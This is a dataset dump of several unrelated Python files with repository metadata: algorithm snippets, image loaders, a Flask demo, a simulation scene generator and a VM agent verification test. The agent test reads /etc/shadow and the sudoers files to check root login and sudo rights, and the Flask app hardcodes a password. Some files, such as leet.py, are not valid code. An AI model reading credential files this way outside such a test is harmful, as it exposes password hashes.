# ----------------------------------------------------------------------
# Copyright 2019-2020 Airinnova AB and the FramAT authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------
"""
Utils
"""
from numbers import Number
class Schemas:
any_int = {'type': int}
any_num = {'type': Number}
pos_int = {'type': int, '>': 0}
pos_number = {'type': Number, '>': 0}
string = {'type': str, '>': 0}
vector3x1 = {'type': list, 'min_len': 3, 'max_len': 3, 'item_types': Number}
vector6x1 = {'type': list, 'min_len': 6, 'max_len': 6, 'item_types': Number}
| 34.057143 | 80 | 0.59396 | 155 | 1,192 | 4.503226 | 0.619355 | 0.08596 | 0.037249 | 0.045845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025253 | 0.169463 | 1,192 | 34 | 81 | 35.058824 | 0.679798 | 0.645134 | 0 | 0 | 0 | 0 | 0.197995 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4994cdca869fe06dd8910a681063b2822b7a3d86 | 2,122 | py | Python | diplom_test/data_reader.py | CrackedSTone/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | 8 | 2019-04-09T07:11:26.000Z | 2020-02-27T16:51:26.000Z | diplom_test/data_reader.py | il-yanko/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | null | null | null | diplom_test/data_reader.py | il-yanko/algorithm-detects-liver-pathology | d52d08e4e6931b3502f083f20d6332f7b6839a3b | [
"Apache-2.0"
] | 2 | 2019-04-04T07:13:02.000Z | 2020-02-06T04:58:34.000Z | import glob
import numpy as np
#import cv2
from PIL import Image
#import os.path
class ImgReader:
def __init__(self):
pass
@staticmethod
def read_directory(dir_path, file_format=None):
try:
images = [np.asarray(Image.open(img_path).convert('L'), dtype=np.uint8)
for img_path in glob.glob(dir_path + "*" + (("." + file_format) if file_format else ""))]
print("It was loaded", len(images), "images from", dir_path)
return images
except Exception as e:
print(e)
return
class DataReader:
def __init__(self):
pass
@staticmethod
def read_directory(dir_path, file_format=None):
try:
images = [np.asarray(np.genfromtxt(img_path, delimiter=','), dtype=np.float64)
for img_path in glob.glob(dir_path + "*" + (("." + file_format) if file_format else ""))]
print("It was loaded", len(images), "datafiles from", dir_path)
return images
except Exception as e:
print(e)
return
# ALTERNATIVE LOADER:
'''
# process RGB/grayscale
def rgb_to_gray(rgb):
# scalar product of colors with certain theoretical coefficients according to the YUV system
return np.dot(rgb[..., :3], [0.299, 0.587, 0.114]).round(3).astype(int)
# download folder BMP
def get_all_bmp(full_dir):
# to calculate number of files in the folder
file_number = len(next(os.walk(full_dir))[2])
# print(fileNumber, "files were found")
img_arr = list()
for i in range(1, file_number + 1):
img_arr.append(cv2.imread(full_dir + '/' + str(i) + ".bmp"))
print(len(img_arr), "images were downloaded")
return img_arr
def get_all_img_make_gray(cwd, folder_name):
path = cwd + "/" + folder_name
print("\nPath = ", path)
img_arr = get_all_bmp(path)
for i in range(len(img_arr)):
img_arr[i] = rgb_to_gray(img_arr[i])
return img_arr
'''
# test load .csv
'''
import os.path
cwd = os.getcwd()
a = cwd + "/glcm/auh/csv/"
data = DataReader.read_directory(a)
print(data[0])
''' | 29.068493 | 111 | 0.615928 | 299 | 2,122 | 4.187291 | 0.384615 | 0.043131 | 0.035144 | 0.054313 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0.340256 | 0 | 0.014539 | 0.254477 | 2,122 | 73 | 112 | 29.068493 | 0.776865 | 0.027804 | 0 | 0.689655 | 0 | 0 | 0.05268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0.068966 | 0.103448 | 0 | 0.448276 | 0.137931 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
499e8f87034a01b4664449514e2ad3632e9bb2a1 | 1,074 | py | Python | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 2,797 | 2015-01-01T15:52:13.000Z | 2022-03-28T20:52:37.000Z | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 35 | 2015-01-07T03:11:18.000Z | 2021-06-27T09:09:55.000Z | dp/kadane.py | williamsmj/prakhar1989-algorithms | 82e64ce9d451b33c1bce64a63276d6341a1f13b0 | [
"WTFPL"
] | 887 | 2015-01-02T06:38:19.000Z | 2022-03-26T20:33:11.000Z | """
Problem: The maximum subarray problem is the task of finding the
contiguous subarray within a one-dimensional array of numbers
(containing at least one positive number) which has the largest sum.
Solution:
The recurrence relation that we solve at each step is the following -
Let S[i] = be the max value contigous subsequence till the ith element
of the array.
Then S[i] = max(A[i], A[i] + S[i - 1])
At each step, we have two options
1) We add the ith element to the sum till the i-1th elem
2) We start a new array starting at i
We take a max of both these options and accordingly build up the array.
"""
def max_value_contigous_subsequence(arr):
A = [arr[0]] + [0] * (len(arr) - 1)
max_to_here = arr[0]
for i in range(1, len(arr)):
A[i] = max(arr[i], arr[i] + A[i-1])
max_to_here = max(max_to_here, A[i])
return max_to_here
if __name__ == "__main__":
x = [-2, -3, 4, -1, -2, 1, 5, -3]
y = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
z = [-1, 3, -5, 4, 6, -1, 2, -7, 13, -3]
print map(max_value_contigous_subsequence, [x, y, z])
| 33.5625 | 71 | 0.645251 | 205 | 1,074 | 3.273171 | 0.42439 | 0.014903 | 0.053651 | 0.125186 | 0.017884 | 0.017884 | 0 | 0 | 0 | 0 | 0 | 0.045564 | 0.223464 | 1,074 | 31 | 72 | 34.645161 | 0.758993 | 0 | 0 | 0 | 0 | 0 | 0.017316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8c9483c89fccb1526f7a1b94d89843858f14cf3 | 3,216 | py | Python | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | import os
import re
import socket
from dotenv import load_dotenv
from dcr.scenario_utils.common_utils import execute_command_and_raise_on_error
from dcr.scenario_utils.models import get_vm_data_from_env
def test_agent_version():
stdout, _ = execute_command_and_raise_on_error(['waagent', '-version'], timeout=30)
# release_file contains:
# AGENT_VERSION = 'x.y.z'
load_dotenv()
expected_version = os.environ.get("AGENTVERSION")
if "Goal state agent: {0}".format(expected_version) not in stdout:
raise Exception("expected version {0} not found".format(expected_version))
return stdout
def check_hostname():
vm_name = get_vm_data_from_env().name
stdout, _ = execute_command_and_raise_on_error(['hostname'], timeout=30)
if vm_name.lower() != stdout.lower():
raise Exception("Hostname does not match! Expected: {0}, found: {1}".format(vm_name, stdout.strip()))
return stdout
def check_ns_lookup():
hostname, _ = execute_command_and_raise_on_error(['hostname'], timeout=30)
ip = socket.gethostbyname(hostname)
msg = "Resolved IP: {0}".format(ip)
print(msg)
return msg
def check_root_login():
stdout, _ = execute_command_and_raise_on_error(['cat', '/etc/shadow'], timeout=30)
root_passwd_line = next(line for line in stdout.splitlines() if 'root' in line)
print(root_passwd_line)
root_passwd = root_passwd_line.split(":")[1]
if any(val in root_passwd for val in ("!", "*", "x")):
return 'root login disabled'
else:
raise Exception('root login appears to be enabled: {0}'.format(root_passwd))
def check_agent_processes():
daemon_pattern = r'.*python.*waagent -daemon$'
handler_pattern = r'.*python.*-run-exthandlers'
status_pattern = r'^(\S+)\s+'
std_out, _ = execute_command_and_raise_on_error(['ps', 'axo', 'stat,args'], timeout=30)
daemon = False
ext_handler = False
agent_processes = [line for line in std_out.splitlines() if 'python' in line]
for process in agent_processes:
if re.match(daemon_pattern, process):
daemon = True
elif re.match(handler_pattern, process):
ext_handler = True
else:
continue
status = re.match(status_pattern, process).groups(1)[0]
if not(status.startswith('S') or status.startswith('R')):
raise Exception('process is not running: {0}'.format(process))
if not daemon:
raise Exception('daemon process not found:\n\n{0}'.format(std_out))
if not ext_handler:
raise Exception('extension handler process not found:\n\n{0}'.format(std_out))
return 'expected processes found running'
def check_sudoers(user):
found = False
root = '/etc/sudoers.d/'
for f in os.listdir(root):
sudoers = os.path.join(root, f)
with open(sudoers) as fh:
for entry in fh.readlines():
if entry.startswith(user) and 'ALL=(ALL)' in entry:
print('entry found: {0}'.format(entry))
found = True
if not found:
raise Exception('user {0} not found'.format(user))
return "Found user {0} in list of sudoers".format(user)
| 30.923077 | 109 | 0.661692 | 440 | 3,216 | 4.631818 | 0.290909 | 0.024043 | 0.050049 | 0.064769 | 0.156035 | 0.140334 | 0.111874 | 0.074583 | 0.074583 | 0 | 0 | 0.009921 | 0.216418 | 3,216 | 103 | 110 | 31.223301 | 0.79881 | 0.014303 | 0 | 0.057143 | 0 | 0 | 0.172403 | 0.00821 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0.071429 | 0.085714 | 0 | 0.257143 | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ca7c27c5d04fb6e63bdc64ba80458973c7d303 | 9,033 | py | Python | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# This file includes mainly a class "randomEpisode" that:
# - draws localization of vehicle
# - draws number of rocks
# - draws position of each rock
# - save in a json file
# Author: Michele
# Project: SmartLoader - Innovation
import json
import random
from geometry_msgs.msg import PoseStamped, Quaternion, Vector3
import math
from math import pi as pi
import src.Unity2RealWorld as toRW
import os
def deleteFileIfExists(filename):
if os.path.exists(filename):
os.remove(filename)
else:
print("The file does not exist")
def find(name, path):
for root, dirs, files in os.walk(path):
if name in files or name in dirs:
return os.path.join(root, name)
def determinePathToConfig():
user=os.getenv("HOME")
simcomloc = find("simcom", user)
confpath = simcomloc+"/config"
return confpath
class randomEpisode:
actual_seed=0
# data = {}
# data['Objects'] = []
# NumberOfRocks = 0
# VehiclePosition= PoseStamped()
def __init__(self, typeOfRand, newseed):
data = {}
data['Objects'] = []
NumberOfRocks = 0
VehiclePosition = PoseStamped()
if newseed != 0:
actual_seed = random.seed(None,2)
if typeOfRand == "verysimple":
NumberOfRocks = random.randint(1,10)
else:
NumberOfRocks = random.randint(1,10)
VehiclePosition.pose.position.x = random.uniform(0,500)
VehiclePosition.pose.position.y = 0
VehiclePosition.pose.position.z = random.uniform(0,500)
euler_orient = Vector3()
euler_orient.x = 0
euler_orient.y = random.uniform(-pi,pi)
euler_orient.z = 0 #random.uniform(-pi,pi)
quat_orient = toRW.euler_to_quaternion(euler_orient.x, euler_orient.y, euler_orient.z)
VehiclePosition.pose.orientation.x = quat_orient[0] #random.uniform(-1,1)
VehiclePosition.pose.orientation.y = quat_orient[1] #random.uniform(-1,1)
VehiclePosition.pose.orientation.z = quat_orient[2] #random.uniform(-1,1)
VehiclePosition.pose.orientation.w = quat_orient[3] #random.uniform(-1,1)
data['Objects'].append({
'Name': 'BobCat',
'Id': 'BobCat',
'Position':
{
'x': VehiclePosition.pose.position.x,
'y': VehiclePosition.pose.position.y,
'z': VehiclePosition.pose.position.z
},
'Rotation':
{
'x': VehiclePosition.pose.orientation.x,
'y': VehiclePosition.pose.orientation.y,
'z': VehiclePosition.pose.orientation.z,
'w': VehiclePosition.pose.orientation.w
},
'Scale':
{
'x': 1,
'y': 1,
'z': 1
}
})
BobcatX = VehiclePosition.pose.position.x
BobcatZ = VehiclePosition.pose.position.z
XMin = BobcatX - 1
XMax = BobcatX + 1
ZMin = BobcatZ - 1.5
ZMax = BobcatZ + 1.5
for i in range(NumberOfRocks):
id = (i+1).__str__()
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
"x": random.uniform(XMin,XMax),
"y": 0,
"z": random.uniform(ZMin,ZMax)
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.01,
"y": 0.01,
"z": 0.01
}
})
# deleteFileIfExists('/home/sload/ws/interfaces/src/simcom/config/InitialScene.json')
filepath = determinePathToConfig()+"/InitialScene.json"
with open(filepath, 'w') as outfile:
json.dump(data, outfile)
class MultipleRocksEpisode:
# actual_seed=0
# data = {}
# data['Objects'] = []
# NumberOfRocks = 0
# VehiclePosition= PoseStamped()
def __init__(self, newseed, NumberOfRocks, marker):
actual_seed = 0
data = {}
data['Objects'] = []
VehiclePosition = PoseStamped()
if newseed != 0:
actual_seed = random.seed(None,2)
VehiclePosition.pose.position.x = 250
VehiclePosition.pose.position.y = 0
VehiclePosition.pose.position.z = 250
euler_orient = Vector3()
euler_orient.x = 0
euler_orient.y = pi/2 #random.uniform(-pi,pi)
euler_orient.z = 0 #random.uniform(-pi,pi)
quat_orient = toRW.euler_to_quaternion(euler_orient.x, euler_orient.y, euler_orient.z)
VehiclePosition.pose.orientation.x = quat_orient[0] #random.uniform(-1,1)
VehiclePosition.pose.orientation.y = quat_orient[1] #random.uniform(-1,1)
VehiclePosition.pose.orientation.z = quat_orient[2] #random.uniform(-1,1)
VehiclePosition.pose.orientation.w = quat_orient[3] #random.uniform(-1,1)
data['Objects'].append({
'Name': 'BobCat',
'Id': 'BobCat',
'Position':
{
'x': VehiclePosition.pose.position.x,
'y': VehiclePosition.pose.position.y,
'z': VehiclePosition.pose.position.z
},
'Rotation':
{
'x': VehiclePosition.pose.orientation.x,
'y': VehiclePosition.pose.orientation.y,
'z': VehiclePosition.pose.orientation.z,
'w': VehiclePosition.pose.orientation.w
},
'Scale':
{
'x': 1,
'y': 1,
'z': 1
}
})
for i in range(NumberOfRocks):
id = (i+1).__str__()
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
"x": 253,
"y": 0,
"z": 250 + random.uniform(-0.5,0.5)
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.25,
"y": 0.25,
"z": 0.25
}
})
if marker:
id = (NumberOfRocks+1).__str__()
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
# "x": 250 + random.uniform(XMin,XMax),
# "x": 258 + random.uniform(-1, 8),
"x": 250 + random.uniform(6, 12),
"y": 0,
"z": 250
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.1,
"y": 0.1,
"z": 0.1
}
})
filepath = determinePathToConfig()+"/InitialScene.json"
with open(filepath,'w') as outfile:
json.dump(data, outfile)
if __name__ == '__main__':
for j in range(3):
scenario = recorderEpisode(j)
| 35.14786 | 94 | 0.469169 | 876 | 9,033 | 4.760274 | 0.166667 | 0.118465 | 0.070504 | 0.071942 | 0.7 | 0.686091 | 0.679856 | 0.672902 | 0.672902 | 0.645564 | 0 | 0.033656 | 0.404627 | 9,033 | 256 | 95 | 35.285156 | 0.741726 | 0.128418 | 0 | 0.59447 | 0 | 0 | 0.046779 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023041 | false | 0 | 0.032258 | 0 | 0.078341 | 0.004608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8cbfca6de86ee3ef9fe472b32eb107264c928c8 | 1,671 | py | Python | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | from flask import Flask, request, render_template
from functions import read_json
import os
# Mandatory
app = Flask(__name__) # __name__ --> __main__
# ---------- Flask functions ----------
@app.route("/") # @ --> esto representa el decorador de la función
def home():
""" Default path """
#return app.send_static_file('greet.html')
return "Por defecto"
@app.route("/greet")
def greet():
username = request.args.get('name')
return render_template('index.html', name=username)
@app.route("/info")
def create_json():
import pandas as pd
df = pd.read_csv('lung_nn_outl.csv')
return df.to_json()
# localhost:6060/give_me_id?password=12345
@app.route('/give_me_id', methods=['GET'])
def give_id():
token_id = request.args['password']
if token_id == "p10875558":
return request.args
else:
return "No es la contraseña correcta"
@app.route("/recibe_informacion")
def recibe_info():
pass
# ---------- Other functions ----------
def main():
print("---------STARTING PROCESS---------")
print(__file__)
# Get the settings fullpath
# \\ --> WINDOWS
# / --> UNIX
# Para ambos: os.sep
settings_file = os.path.dirname(__file__) + os.sep + "settings.json"
print(settings_file)
# Load json from file
json_readed = read_json(fullpath=settings_file)
# Load variables from jsons
DEBUG = json_readed["debug"]
HOST = json_readed["host"]
PORT_NUM = json_readed["port"]
# Dos posibilidades:
# HOST = "0.0.0.0"
# HOST = "127.0.0.1" --> localhost
app.run(debug=DEBUG, host=HOST, port=PORT_NUM)
if __name__ == "__main__":
main() | 25.318182 | 72 | 0.625972 | 214 | 1,671 | 4.621495 | 0.443925 | 0.040445 | 0.016178 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020331 | 0.205266 | 1,671 | 66 | 73 | 25.318182 | 0.724398 | 0.264512 | 0 | 0 | 0 | 0 | 0.164735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0.052632 | 0.105263 | 0 | 0.394737 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b8df7da99167063e92023aa153878ad215a2e8ff | 2,476 | py | Python | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | 第一题:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
#str = input()
#print(str)
class Solution(object):
def findMedium(l):
length = len(l)
l.sort()
# 如果为奇数,输出中间的值
if length % 2 != 0:
print(l[length//2])
# 如果为偶数,中心两位均值
else:
print((l[length//2-1] + l[length//2])/2)
l = [1, 3, 5, 2, 8, 7]
Solution.findMedium(l)
第二题:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
# str = input()
# print(str)
class Solution:
def maxStr(str_in):
# 初始化
length = len(str_in)
count = [0 for i in range(26)]
char_a = ord('a')
# 统计出现次数
for i in range(length):
count[ord(str_in[i]) - char_a] += 1
last = str_in[0]
num = 1
res = 1
for m in range(1, length):
# 不同
if last != str_in[m]:
tmp_idx = m
while (tmp_idx + 1 < length) and (last == str_in[tmp_idx + 1]):
num += 1
tmp_idx += 1
if count[ord(last) - char_a] > num:
num += 1
num, res = 1, max(num, res)
last = str_in[m]
# 相同则累加
else:
num += 1
if (num > 1) and (count[ord(last) - char_a] > num):
num += 1
# 获取 max 长度后,对 str 遍历访问
max_length = max(num, res)
str2ls = list(str_in)
for i in count:
if i != max_length:
str2ls = str2ls[i:]
else:
str2ls = str2ls[:max_length]
out = ''.join(str2ls)
print(out)
return (out)
text = 'abbbbcccddddddddeee'
Solution.maxStr(text)
第三题:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
#str = input()
#print(str)
class Solution:
def findMaxArray(l):
# 初始化
tmp = l[0]
max_val = tmp
length = len(l)
for i in range(1, length):
# 计算当前序列和,记录当前最大值
if tmp + l[i] > l[i]:
max_val = max(max_val, tmp + l[i])
tmp = tmp + l[i]
# 否则到此为最长序列,并记录此时最大值
else:
max_val = max(max_val, tmp, tmp+l[i], l[i])
tmp = l[i]
print(max_val)
return max_val
l = [1, -2, 4, 5, -1, 1]
Solution.findMaxArray(l) | 23.358491 | 79 | 0.468094 | 328 | 2,476 | 3.454268 | 0.234756 | 0.035305 | 0.022065 | 0.045013 | 0.348632 | 0.336275 | 0.304501 | 0.304501 | 0.262136 | 0.262136 | 0 | 0.031821 | 0.403473 | 2,476 | 106 | 80 | 23.358491 | 0.735274 | 0.07189 | 0 | 0.283784 | 0 | 0 | 0.015331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.081081 | null | null | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8e9db6f289a79604e54db518d87b8a53a1a0672 | 504 | py | Python | weasyl/test/test_http.py | hyena/weasyl | a43ad885eb07ae89d6639f289a5b95f3a177439c | [
"Apache-2.0"
] | 111 | 2016-05-18T04:18:18.000Z | 2021-11-03T02:05:19.000Z | weasyl/test/test_http.py | hyena/weasyl | a43ad885eb07ae89d6639f289a5b95f3a177439c | [
"Apache-2.0"
] | 1,103 | 2016-05-29T05:17:53.000Z | 2022-03-31T18:12:40.000Z | weasyl/test/test_http.py | TheWug/weasyl | a568a542cc58c11e30621fb672c701531d4306a8 | [
"Apache-2.0"
] | 47 | 2016-05-29T20:48:37.000Z | 2021-11-12T09:40:40.000Z | import pytest
from weasyl import http
@pytest.mark.parametrize(('wsgi_env', 'expected'), [
({}, {}),
({'PATH_INFO': '/search', 'QUERY_STRING': 'q=example'}, {}),
({'HTTP_ACCEPT': '*/*'}, {'Accept': '*/*'}),
(
{'CONTENT_LENGTH': '', 'HTTP_ACCEPT_ENCODING': 'gzip', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1'},
{'Accept-Encoding': 'gzip', 'Upgrade-Insecure-Requests': '1'},
),
])
def test_get_headers(wsgi_env, expected):
assert http.get_headers(wsgi_env) == expected
| 29.647059 | 102 | 0.603175 | 54 | 504 | 5.351852 | 0.574074 | 0.072664 | 0.155709 | 0.16609 | 0.17301 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004751 | 0.164683 | 504 | 16 | 103 | 31.5 | 0.68171 | 0 | 0 | 0 | 0 | 0 | 0.376984 | 0.109127 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ea0aefe02a0ac8e734a613a8836ee2fbeec6cf | 421 | py | Python | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | 2 | 2021-03-30T01:09:51.000Z | 2022-03-10T21:17:15.000Z | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | null | null | null | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | null | null | null | from neural_network.train import Trainer
class Classifier():
def __init__(self, train=False):
self.train = train
self.trainer = Trainer()
if not self.train:
self.trainer.load()
else:
self.trainer.train()
def classify(self, audio_file_path):
#prediction = self.trainer.predict(audio_file_path)
self.trainer.plot_prediction(audio_file_path) | 28.066667 | 59 | 0.643705 | 50 | 421 | 5.18 | 0.46 | 0.212355 | 0.150579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261283 | 421 | 15 | 60 | 28.066667 | 0.832797 | 0.118765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ea2be5c0eee4133b1b628fc992cd2fbe84768f | 556 | py | Python | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 40 | 2015-03-05T18:22:51.000Z | 2022-03-06T07:29:25.000Z | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 106 | 2015-01-12T18:52:20.000Z | 2021-04-25T22:57:52.000Z | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 30 | 2015-03-25T07:24:40.000Z | 2021-07-23T17:10:11.000Z | # Copyright (c) 2020, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities, fields
import cybox.bindings.cybox_common as common_binding
class Metadata(entities.Entity):
_binding = common_binding
_binding_class = common_binding.MetadataType
_namespace = 'http://cybox.mitre.org/common-2'
type_ = fields.TypedField("type_", key_name="type")
value = fields.TypedField("Value")
subdatum = fields.TypedField("SubDatum", type_="cybox.common.metadata.Metadata", multiple=True)
